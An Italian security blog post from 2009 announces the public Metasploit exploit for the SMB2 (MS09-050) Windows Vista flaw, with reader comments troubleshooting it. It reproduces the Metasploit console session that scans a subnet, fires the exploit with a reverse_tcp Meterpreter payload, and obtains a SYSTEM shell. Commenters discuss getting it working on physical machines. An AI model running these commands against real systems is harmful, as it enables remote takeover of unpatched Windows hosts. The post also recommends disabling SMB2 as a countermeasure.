Atteso da qualche giorno, è finalmente arrivato il modulo Metasploit per l’attacco SMB2.
La storia ormai è abbastanza nota, ne ho parlatto diffusamente nei post precedenti. In sintesi ricordo che qualche settimana fa è stato scoperto un bug per Vista.
All’inizio sembrava che il bug potesse essere sfruttato unicamente come DoS. Successivamente è apparso un exploit per una prodotto commerciale in grado di sfruttare la vulnerabilità per ottenere l’accesso remoto. Infine è apparso anche l’exploit per Metasploit, il più popolare framework open-source per il penetration testing.
Oltre all’exploit è stato reso disponibile un modulo ausiliario (auxiliary/scanner/smb/smb2) per effettuare la scansione di un sistema e testarrne la vulnerabilità.
Prendo direttamente dal blog di Metasploit la dimostrazione di come funziona lo scanner:
msf> use auxiliary/scanner/smb/smb2
msf (auxiliary/smb2) > set RHOSTS 192.168.0.0/24
msf (auxiliary/smb2) > set THREADS 100
msf (auxiliary/smb2) > run
[*] 192.168.0.142 supports SMB 2 [dialect 2.2] and has been online for 54 hours
[*] 192.168.0.211 supports SMB 2 [dialect 2.2] and has been online for 53 hours
e l’attacco vero e proprio:
msf> use exploit/windows/smb/smb2_negotiate_func_index
msf (exploit/smb2) > set PAYLOAD windows/meterpreter/reverse_tcp
msf (exploit/smb2) > set LHOST 192.168.0.136
msf (exploit/smb2) > set LPORT 5678
msf (exploit/smb2) > set RHOST 192.168.0.211
msf (exploit/smb2) > exploit
[*] Started reverse handler
[*] Connecting to the target (192.168.0.211:445)…
[*] Sending the exploit packet (854 bytes)…
[*] Waiting up to 180 seconds for exploit to trigger…
[*] Sending stage (719360 bytes)
[*] Meterpreter session 2 opened (192.168.0.136:5678 -> 192.168.0.211:49158)
meterpreter > sysinfo
Computer: WIN-UAKGQGDWLX2
OS : Windows 2008 (Build 6001, Service Pack 1).
Arch : x86
Language: en_US
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
Questo exploit termina l’attesa per il rilascio di un exploit pubblico (e gratuito). Inevitabilmente ora il numero degli attacchi aumenterà, e il codice pubblico potrà essere sfruttato dai worm writer per assemblare malware in grado di sfruttare questa vulnerabilità. Ricordo che al momento non esistono patch: la contromisura migliore è quella di disabilitare SMB2.
Chi non avesse mai sentito parlare di Metasploit e si fosse incuriosito, può dare uno sguardo a questo articolo “Hackerare Windows con Metasploit“.
PillolHacking.Net: I Migliori Articoli di Settembre 2009
Settembre è stato un po' anomalo, monopolizzato dalle notizie sui bug di Windows, in particolare quello... SMB2 Remote Exploit
Avevo accennato a questa possibilità nell'articolo in cui parlavo di questo bug per Vista. Ora è realtà:... Disabilitare SMB2 con un Click
Continua l'odissea del bug si SMB2 in Windows Vista. Dopo la scoperta della vulnerabilità, che in una... Vista Vulnerabile ad un Nuovo Attacco DoS
Mese difficile per Microsoft. Dopo il bug dell'Ftp di IIS, ha fatto la sua apparizione pubblica un...
set 30, 2009 at 18:06:13
Sono bloccato su “Waiting up to 180 seconds for exploit to trigger…”
eppure il precedente exploit (bsod per intenderci) funziona sulla macchiana target
ott 3, 2009 at 20:14:10
Io, ho provato ad attaccare il mio Vista xd con backtrack ed ho constatato che il sistema cracha xd (schermata blu) e non mi si apre la shell -_-’
ott 7, 2009 at 19:53:32
Sembra che l’exploit di Metasploit non funzioni bene con la macchine fisiche ma solo con le virtual machine.
Pare però che Piotr Bania abbia trovato un rimedio
http://blog.metasploit.com/2009/10/smb2-351-packets-from-trampoline.html
http://www.securitytube.net/Microsoft-SMB-Negotiate-ProcessID-Function-Table-Dereference-%280-Day%29-video.aspx
ott 14, 2010 at 15:29:27
Ciao Angelo,
scusa se commento un vecchio post ma mi sono appena affacciato a questo nuovo mondo e sto cercando di capire il più possibile facendo delle prove. Ho letto il blog di metasploit ma non ci ho capito granchè.. ho provato l’exploit su una macchina fisica e non funziona… mi sono perso qualcosa ??
Nel post sul blog si parlava di un modulo aggiornato.. io ho appena fatto un svn update e l’exploit ha cambiato path io l’ho torvato in exploit/windows/smb/ms09_050_smb2_negotiate_func_index parliamo dell’exploit giusto ?
ott 14, 2010 at 20:19:26
si,dovrebbe essere MS09-050.
ott 18, 2010 at 12:26:31
ma quello che ho indicato io è quello aggiornato che dovrebbe funzionare anche sulle installazioni fisiche ??
ott 18, 2010 at 20:40:31
dovrebbe essere quello giusto